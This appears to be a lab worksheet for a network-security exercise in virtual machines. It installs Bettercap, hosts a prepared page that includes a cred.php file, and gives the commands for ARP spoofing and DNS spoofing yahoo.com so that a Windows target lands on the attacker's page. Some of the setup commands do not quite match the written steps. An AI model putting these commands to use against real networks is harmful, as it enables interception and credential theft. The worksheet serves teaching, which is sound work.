Task 1: Bettercap Tool Installation

Step 1

• Run Kali Linux, Windows, and pfSense VMs.

Step 2

• On your Kali Linux machine, install Bettercap.

Step 3

• Download the zipped Bettercap file using the following link: https://github.com/bettercap/bettercap/releases/download/v2.31.1/bettercap_linux_amd64_v2.31.1.zip

Step 4

• Unzip the file. You can run Bettercap with the ./bettercap command. Be sure you are in the proper directory.

apt install bettercap

Task 2: Upload the Website Files

Step 1

• Back up the files in /var/www/html in your Linux machine.

cd /var/www
cp -a html/. /root/Desktop/
rm *

Step 2

• Copy all the provided additional files to /var/www/html

cd /root/Desktop/webpage/
mv cred.php image.jpg index.html /var/www/html/

Step 3

• Make the website available for browsing.

service apache2 start
service apache2 status

Step 4

• Verify the website is operational by browsing to your IP address.

Task 3: Become the On-Path

Step 1

• Use Bettercap to become the On-Path.

bettercap
set arp.spoof.targets [target_ip]
arp.spoof on

Step 2

• Check the target’s ARP table to verify the attack was successful.

Task 4: Spoof the Target’s DNS

Step 1

• Use Bettercap to execute DNS spoofing. Set Yahoo.com as the domain to be spoofed.

set dns.spoof.domains yahoo.com
set dns.spoof.address [Kali_ip]
dns.spoof on

Step 2

• From the Windows machine, navigate to Yahoo.com to verify the attack was successful.